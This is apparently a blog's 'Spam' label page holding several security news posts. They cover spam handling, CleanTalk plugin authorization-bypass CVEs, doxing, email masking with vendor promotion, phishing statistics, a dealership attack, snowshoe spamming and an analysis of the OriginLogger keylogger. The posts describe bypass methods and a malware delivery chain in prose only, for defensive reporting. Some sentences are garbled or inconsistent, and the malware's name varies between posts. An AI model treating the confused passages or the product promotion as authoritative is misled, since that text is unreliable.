Search This Blog
Powered by Blogger.

Blog Archive

Labels

About Me

Load More
Trendy Right Now

Popular Posts

Showing posts with label Spam. Show all posts
Spam
Cyber Security Emails Gmail Outlook Spam

Why You Shouldn’t Delete Spam Emails Right Away

 



Unwanted emails, commonly known as spam, fill up inboxes daily. Many people delete them without a second thought, assuming it’s the best way to get rid of them. However, cybersecurity experts advise against this. Instead of deleting spam messages immediately, marking them as junk can improve your email provider’s ability to filter them out in the future.  


The Importance of Marking Emails as Spam  

Most email services, such as Gmail, Outlook, and Yahoo, use automatic spam filters to separate important emails from unwanted ones. These filters rely on user feedback to improve their accuracy. If you simply delete spam emails without marking them as junk, the system does not learn from them and may not filter similar messages in the future.  

Here’s how you can help improve your email’s spam filter:  

• If you use an email app (like Outlook or Thunderbird): Manually mark unwanted messages as spam if they appear in your inbox. This teaches the software to recognize similar messages and block them.  

• If you check your email in a web browser: If a spam message ends up in your inbox instead of the spam folder, select it and move it to the junk folder. This helps train the system to detect similar threats.  

By following these steps, you not only reduce spam in your inbox but also contribute to improving the filtering system for other users.  


Why You Should Never Click "Unsubscribe" on Suspicious Emails  

Many spam emails include an option to "unsubscribe," which might seem like an easy way to stop receiving them. However, clicking this button can be risky.  

Cybercriminals send millions of emails to random addresses, hoping to find active users. When you click "unsubscribe," you confirm that your email address is valid and actively monitored. Instead of stopping, spammers may send you even more unwanted emails. In some cases, clicking the link can also direct you to malicious websites or even install harmful software on your device.  

To stay safe, avoid clicking "unsubscribe" on emails from unknown sources. Instead, mark them as spam and move them to the junk folder.  


Simple Ways to Protect Yourself from Spam  

Spam emails are not just a nuisance; they can also be dangerous. Some contain links to fake websites, tricking people into revealing personal information. Others may carry harmful attachments that install malware on your device. To protect yourself, follow these simple steps:  

1. Stay Alert: If an email seems suspicious or asks for personal information, be cautious. Legitimate companies do not ask for sensitive details through email.  

2. Avoid Acting in a Hurry: Scammers often create a sense of urgency, pressuring you to act quickly. If an email claims you must take immediate action, think twice before responding.  

3. Do Not Click on Unknown Links: If an email contains a link, avoid clicking it. Instead, visit the official website by typing the web address into your browser.  

4. Avoid Opening Attachments from Unknown Senders: Malware can be hidden in email attachments, including PDFs, Word documents, and ZIP files. Open attachments only if you trust the sender.  

5. Use Security Software: Install antivirus and anti-spam software to help detect and block harmful emails before they reach your inbox.  


Spam emails may seem harmless, but how you handle them can affect your online security. Instead of deleting them right away, marking them as spam helps email providers refine their filters and block similar messages in the future. Additionally, never click "unsubscribe" in suspicious emails, as it can lead to more spam or even security threats. By following simple email safety habits, you can reduce risks and keep your inbox secure.

Read more »
Spam
critical vulnerabilities CVE CVE vulnerability CVEs Cyber Security Plugin Flaws plugin security Plugins RCE Spam

Critical Vulnerabilities in CleanTalk WordPress Plugin Put 200,000 Websites at Risk

 

Defiant has raised alarms about two significant vulnerabilities affecting CleanTalk’s anti-spam WordPress plugin, which could enable attackers to execute arbitrary code remotely without requiring authentication. These vulnerabilities, tracked as CVE-2024-10542 and CVE-2024-10781, are classified with a high severity score of 9.8 on the CVSS scale. They impact the “Spam protection, Anti-Spam, FireWall by CleanTalk” plugin, which boasts over 200,000 active installations on WordPress sites globally. 

The flaws pose a significant risk by allowing remote attackers to install and activate arbitrary plugins, including potentially vulnerable ones that can then be exploited for remote code execution (RCE). According to Defiant, the first vulnerability, CVE-2024-10542, involves an authorization bypass issue. This weakness exists in a function responsible for handling remote calls and plugin installations, where token-based authorization is used to secure these actions. 

However, two related functions intended to verify the originating IP address and domain name are vulnerable to exploitation. Attackers can manipulate these checks through IP and DNS spoofing, enabling them to specify an IP address or subdomain under their control. This bypasses the plugin’s authorization process, allowing the attacker to carry out actions such as installing, activating, deactivating, or uninstalling plugins without proper permissions. The vulnerability was discovered in late October and was addressed with the release of version 6.44 of the plugin on November 1. 

However, this update inadvertently introduced another vulnerability, CVE-2024-10781, which provided attackers with an alternative method of bypassing token authorization. CVE-2024-10781 arises from a flaw in how the plugin processes tokens for authorization. Specifically, if a website has not configured an API key in the plugin, attackers can use a token that matches an empty hash value to authenticate themselves. This effectively nullifies the intended security measures and allows attackers to install and activate arbitrary plugins, which can then be exploited for malicious purposes, such as executing remote code. 

The CleanTalk development team addressed this second vulnerability with the release of version 6.45 on November 14, which contains fixes for both CVE-2024-10542 and CVE-2024-10781. Despite the availability of this updated version, data from WordPress indicates that as of November 26, approximately half of the plugin’s active installations are still running outdated and vulnerable versions. This exposes a significant number of websites to potential exploitation. The risks associated with these vulnerabilities are considerable, as attackers could gain complete control over affected websites by leveraging these flaws. This includes the ability to install additional plugins, some of which may themselves contain vulnerabilities that could be exploited for further malicious activities. 

Website administrators using the CleanTalk anti-spam plugin are strongly urged to update to version 6.45 or later as soon as possible. Keeping plugins up to date is a critical step in maintaining the security of WordPress websites. By applying the latest updates, administrators can protect their sites against known vulnerabilities and reduce the risk of being targeted by cyberattacks. In addition to updating plugins, security experts recommend implementing additional security measures, such as monitoring for unauthorized changes, using a robust firewall, and conducting regular security audits. 

These practices can help ensure that websites remain secure against evolving threats. By addressing these vulnerabilities and staying proactive about updates, WordPress site owners can safeguard their online presence and protect the sensitive data entrusted to their platforms.
Read more »
Spam
Doxing Email address IP Address Privacy Sensitive data Spam

Doxing: Is Your Personal Information at Risk?


 

Doxing is the online slang for "dropping documents," which means revealing private information about a person or his identity to the public without his permission. It may be as simple as a person's name, e-mail, or phone number, but it can also include confidential data like financial information, home addresses, and even personal photos. Typically, hackers or cybercrooks do this with the aim of causing harm to that person, either through identity theft, fraud, or embarrassment.

The methods are varied, from hackers involving social media platforms or public databases in obtaining personal information to others using phishing techniques to get sensitive information from unsuspecting individuals. Once out of a computer within, it is no longer within one's control, and the impacts may be dire, touching on every point in an individual's life.


Impact of Doxing on Victims

With private information made public, victims of such situations can easily become victimised with harassment, identity theft, and other kinds of exploitative activities. In many cases, it just feels like a privacy violation; this can evoke feelings of vulnerability and betrayal. Even if the individual responsible is unknown to the victim, they may feel as if they are always in danger.

The extent of damage would also depend on the type of information that is leaked. For instance, if one accesses financial information, then the victims would lose their money when financially victimised to fraud and theft. It is in sensitive photos or private details where reputations get adversely tainted, relationships get harmed in society, or even employment loss. Sensitive data like online search histories can, in extreme cases, lead to even worse consequences: public humiliation.


Why You Shouldn't Leak Your Email Address

You might think that nothing substantial can be generated from your email address, but believe me, it has a fair amount of valuable information attached to it. I mean, sure, you share it with your friends, family, or maybe some business that's running loyalty programs or will mail you receipts. But would you like everyone in the world to have access to it? I didn't think so. Once you send out your email, cyber thieves have an open opportunity to flood your inbox with spam, phishing attempts, or risky malware disguised as legitimate messages. In case you click on any of these links and accidentally let a cyber thief steal your device, it may be compromised.

Beyond spam, hackers can use your email to forge accounts in your name, damaging your reputation online. How dangerous the simple act of gaining access and maliciously using your email address is becomes clear when considering that even the smallest piece of personal information can be dangerous.


Examples of Real Doxing Impact in Life

The outcomes of doxing, at least in some well-publicised instances, can be catastrophic. For Claira Janover, a satirical video that she shot actually found its way onto the internet and led to death threats, including even publicising her home address. She was forced to change her address. Even Deloitte-the firm that had already hired her-now rescinded their job offer, given some online activity that was associated with her professional profile.

The same instance comes in the form of the 2013 Boston Marathon bombing investigation. Here, internet communities like Reddit and 4Chan branded innocent people with incorrect accusations. The anguish of misidentified families had to be bearable while their loved ones' names streamed online as wrongly linked to the attack. These prove that doxing does not only hack privacy but could also have life-altering results.


How to protect yourself from Doxing

Being doxed is inevitable for everyone, but there are many things you can do to avoid falling victim. The number one and perhaps most relevant is practising good cyber safety: lock up the doors, so to speak. Keep your social media accounts private and be very selective of who follows or is connected to you online. Regularly check on your privacy settings and ensure that no one can access sensitive information about you in public media.

This can be enhanced by masking your IP address with a VPN (Virtual Private Network) while making a separate email account for communication, shopping, and all the professional work you do online. Clicking on any suspicious link at any time can harm you: never do it, not even if it looks legit.

Doxing is a serious form of cybercrime, which has deep and far-reaching effects on a victim's personal and professional life. The important thing for an individual to know is that being aware of the danger and taking proactive steps to protect your information is enough to lower the bar for such an attack. Digital privacy protection is the need of today.


Read more »
VPNS
Dark Web Email address email masking NordVPN Privacy Spam VPNS

Why You Should Mask Your Email Address


 

In today's digital age, entering your real email address into a website is a risky move. It's all too common for websites to sell your information to data brokers, who then use it for marketing, targeted ads, or even reselling. To safeguard your privacy and security, masking your email address has become a crucial practice.

Email masking is essential not just for avoiding spam but also for protecting your personal information from falling into the wrong hands. If your email address is leaked in a data breach, it could end up on the dark web, accessible to scammers and cybercriminals. These malicious actors store your data in databases for use in scams and hacking attempts. Additionally, there have been instances where government bodies have purchased data broker information for surveillance purposes.

By using masked emails when signing up for services and accounts, you can prevent your details from being leaked. A masked email can be discarded with a single click, rendering it useless to scammers. This proactive measure significantly reduces your risk of being targeted by cyber threats.

Easy Solutions for Email Masking

For those looking to enhance their privacy effortlessly, two services stand out: NordVPN and Surfshark. These VPN providers offer more than just secure internet connections; they also provide simple and effective email masking solutions.

NordVPN integrates email masking with its built-in password manager, NordPass. This service is user-friendly, offering fast speeds and excellent content unblocking capabilities. Priced at $3.39 per month for a two-year plan, NordVPN delivers great value and a range of privacy tools. Plus, it comes with a 30-day money-back guarantee, allowing you to try it risk-free.

Surfshark is another excellent choice, especially for those on a budget. It not only masks your email but also offers phone number masking for users in the US, with plans to expand this feature to other regions. Known for its speed and effectiveness in streaming, Surfshark provides a high-quality VPN service with a 30-day money-back guarantee. This allows you to test the service before committing.

Using a VPN like NordVPN or Surfshark offers several other benefits. These services protect your devices from hackers, enable you to stream content from abroad, and block ads and malware. The comprehensive protection offered by VPNs makes them a valuable tool for maintaining online privacy and security.


Taking Privacy Further with Incogni

For those looking to take their privacy a step further, Incogni is a useful tool. It actively removes your information from data brokers, reducing the chances of being targeted by aggressive marketing and advertisers. Bundling Incogni with a Surfshark subscription can be a cost-effective way to enhance your privacy defences.

Keeping your email address private is a simple yet powerful way to protect yourself from unwanted spam and cyber threats. By utilising services like NordVPN and Surfshark for email masking, and tools like Incogni for data removal, you can enjoy a more secure and private online experience.


Read more »
VIPRE Security Group
AI Detection Chat-GPT Cloud Services cloud storage services generative AI tools hacker tactics malspam malware delivery Phishing emails phishing threats Spam Technology VIPRE Security Group

Rising Email Security Threats: Here’s All You Need to Know

 

A recent study highlights the heightened threat posed by spam and phishing emails due to the proliferation of generative artificial intelligence (AI) tools such as Chat-GPT and the growing popularity of cloud services.

According to a fresh report from VIPRE Security Group, the surge in cloud usage has correlated with an uptick in hacker activity. In this quarter, 58% of malicious emails were found to be delivering malware through links, while the remaining 42% relied on attachments.

Furthermore, cloud storage services have emerged as a prominent method for delivering malicious spam (malspam), accounting for 67% of such delivery in the quarter, as per VIPRE's findings. The remaining 33% utilized legitimate yet manipulated websites.

The integration of generative AI tools has made it significantly harder to detect spam and phishing emails. Traditionally, grammatical errors, misspellings, or unusual formatting were red flags that tipped off potential victims to the phishing attempt, enabling them to avoid downloading attachments or clicking on links.

However, with the advent of AI tools like Chat-GPT, hackers are now able to craft well-structured, linguistically sophisticated messages that are virtually indistinguishable from benign correspondence. This necessitates victims to adopt additional precautions to thwart the threat.

In the third quarter of this year alone, VIPRE's tools identified a staggering 233.9 million malicious emails. Among these, 110 million contained malicious content, while 118 million carried malicious attachments. Moreover, 150,000 emails displayed "previously unknown behaviors," indicating that hackers are continually innovating their strategies to optimize performance.

Phishing and spam persist as favored attack methods in the arsenal of every hacker. They are cost-effective to produce and deploy, and with a stroke of luck, can reach a wide audience of potential victims. Companies are advised to educate their staff about the risks associated with phishing and to meticulously scrutinize every incoming email, regardless of the sender's apparent legitimacy.
Read more »
Zero Day exploit
Data Breach Phishing Attacks Spam User Privacy Zero Day exploit

Christmas Eve Hack Targets Arnold Clark

Hackers launched a notorious Christmas Eve cyberattack against Arnold Clark, a car dealership. The network issue that has affected computer and telephone services has caused customers who had appointments this week for maintenance and repairs to be rescheduled.

Uncertainty surrounds the issue's timing as the vehicle manufacturer operates two dealerships in the town both on Annan Road. This incident is just one indication of how susceptible businesses can be to online crime, especially over the holidays when many firms are less watchful of security precautions than they typically would be.

The company's IT security staff confirmed that, as of right now, there is no proof of client data being compromised when the system fault first surfaced on Christmas Eve.

On Wednesday, an official told the newspaper: "Over the Christmas holiday, we experienced a network issue that had an impact on both our computer and phone systems. Through their investigations so far, our IT security team has verified that there is no proof that any customer data has been hacked. We want to take this chance to express our gratitude to our clients for their understanding and our regret for any trouble this may have caused."

The attack's origin is still an enigma, but it might have been brought on by various factors. It is possible that an employee unintentionally clicked a harmful link or attachment in an email, allowing hackers to access the company's networks. Another theory is that the attack occurred via a zero-day exploit, which refers to a software flaw previously unknown and used by hackers to enter networks before it is too late.

If sufficient cybersecurity precautions are not taken, cyberattacks such as the one Arnold Clark experienced can occur at any moment and cause significant harm. Businesses must ensure they have sufficient safeguards in place, including multi-factor authentication and frequent system updates, as well as educate their personnel on fundamental cybersecurity concepts like avoiding clicking links from unknown sources and maintaining passwords safe and secure.



Read more »
Spam
Cyber Security Email Email Attacks Fraud Mails Phishing and Spam Phishing Attacks Spam

Snowshoeing: How the Tactic can Spam Through Your E-mails

 

Cybercriminals employ a wide array of fraudulent techniques to entice users into falling for their email traps. One such infamous technique that draws attention while we speak of various scamming methods, is ‘Spam Emails’. 
 
Spam emails are one of the various pitfalls for netizens. These emails come with a multitude of capacities and can have numerous impacts on a user, even leading to severe scams. One of the spamming tactics used by spammers is 'Snowshoeing', which we will be discussing today. What is Snowshoeing? Snowshoeing is essentially spamming on a very large scale. In a snowshoeing campaign, the spammer may use multiple IP addresses in order to spread spam emails over various internet domains.  
 
Snowshoeing technique derives its name from how 'snow shoes' spread across a large surface area. If you use a regular shoe on snow, it will most likely result in you sinking or slipping on the ice. With snow shoes, a person's weight spreads out more evenly, they are designed to have that effect.  
 
Similarly, in Snowshoeing spamming, the attacker makes use of multiple IP addresses, rather than one, in order to consequently spread the spam load across various domains. This way, Snowshoeing spam could comparatively be very dangerous to its targets than many other spamming tactics. 
 

What Does Snowshoe Spamming Mean? 


Snowshoe spamming is a strategy in which spam is propagated over several domains and IP addresses to weaken reputation metrics and avoid filters. The increasing number of IP addresses makes recognizing and capturing spam difficult, which means that a certain amount of spam reaches their destination email inboxes. Specialized spam trapping organizations are often hard-pressed to identify and trap snowshoe spamming via conventional spam filters.  
 
The strategy of snowshoe spamming is similar to actual snowshoes that distribute the weight of an individual over a wide area to avoid sinking into the snow. Likewise, snowshoe spamming delivers its weight over a wide area to steer clear of filters, expertly navigating them.  

 
How does Snowshoeing work? 

 
Snowshoeing differs from other solicited bulk mail and criminal spams, as in Snowshoeing, the attacker leverages several fraudulent business names and fake identities than just one, changing voice-mails and postal drops on a regular basis.  
 
While a reputable mailer put a good effort to garner trust from an audience, and to develop a brand reputation by using legitimate business addresses, identified domains, and small, static, and easily identifiable selection of IPs, in order to present the audience with a legitimate identity. On the other hand, Snowshoe spammers make use of anonymous and unidentified "whois" records. 
 
To further spread the spam load, snowshoe spammers frequently utilise domain assortments, which may be connected to many providers and servers.   
 
Snowshoe spammers use anonymous domains, which makes it nearly impossible to track down the owner and report the spam. 
 

How to tackle Snowshoeing spam? 

 
In order to mitigate Snowshoe spamming, administrators may follow certain steps, such as applying policies hierarchically at the organization, group, or mailbox level. One may as well rewrite addresses. For complex, multi-domain environments, one may rewrite both inbound and outgoing addresses. 
 
Read more »
Spam
Agent Tesla Cyber Crime Dark Web Domain keylogger Palo Alto Networks' Unit 42 Remote Access Trojan Spam

Analysis on Agent Tesla's Successor

OriginLogger, a malware that has been hailed as the replacement for the well-known data theft and remote access trojan (RAT) noted as Agent Tesla, had its functioning dissected by Palo Alto Networks Unit 42

Agent Tesla, one of the most notorious keyloggers used by hackers, was shut down on March 4, 2019, due to legal issues. It is a remote access program built on the.NET platform, that has long existed in the cyber realm, enabling malicious actors to obtain remote access to target devices and transmit user data to a domain under their control. It has been in the public since 2014 and is promoted for sale on dark web forums. Typically, attackers send it as an attachment in harmful spam emails.

Since Agent Tesla and OriginLogger are both commercialized keyloggers, it should not be assumed that one has a distinct advantage over the other in terms of initial droppers. 

Security company Sophos revealed two new versions of the common virus in February 2021, with the ability to steal login information from online browsers, email clients, and VPN clients as well as use the Telegram API for command and control.

According to Unit 42 researcher Jeff White, what has been labeled as Agent Tesla version 3 is OriginLogger, which is alleged to have emerged to fill the gap left by the former after its operators shut down the business.

A YouTube video explaining its features served as the foundation for the cybersecurity company's study, which resulted in the detection of a malware sample "OriginLogger.exe" that was added to the VirusTotal malware archive on May 17, 2022.

The binary is a developer code that enables a purchased client to specify the kind of data to be acquired, including screenshots, the clipboard, and the list of services and programs from which the keys are to be retrieved.

Unlike the IP addresses linked to originpro[.]me, 74.118.138[.]76 resolves to 0xfd3[.]com rather than any OriginLogger domains directly. Turning to this domain reveals that it has MX and TXT entries for mail. originlogger[.]com in the DNS.

Around March 7, 2022, the disputed domain started to resolve to IP 23.106.223[.]47, one octet higher than the IP used for originpro[.]me, which used 46. 

OrionLogger uses both Google Chrome and Microsoft Outlook, both of which were utilized by Unit 42 to locate a GitHub profile with the username 0xfd3 that had two source code repositories for obtaining credentials from those two applications.

Similar to Agent Tesla, OrionLogger is distributed via a fake Word file that, when viewed, is utilized to portray an image of a German passport, a credit card, and several Excel Worksheets that are embedded in it.

The files essentially include a VBA macro that uses MSHTA to call a remote server's HTML page, which contains obfuscated JavaScript code that allows it to access two encoded binaries stored on Bitbucket.

Advertisements from threat actors claim that the malware employs time-tested techniques and can keylog, steal credentials, and screenshots, download additional payloads, post your data in a variety of ways, and try to escape detection.

A corpus analysis of over 1,900 samples reveals that using 181 different bots and SMTP, FTP, web uploads to the OrionLogger panel, and Telegram are the most popular exfiltration methods for returning data to the attacker. The goal of this investigation was to automate and retrieve keylogger configuration-related information.





Read more »
Subscribe to: Posts (Atom)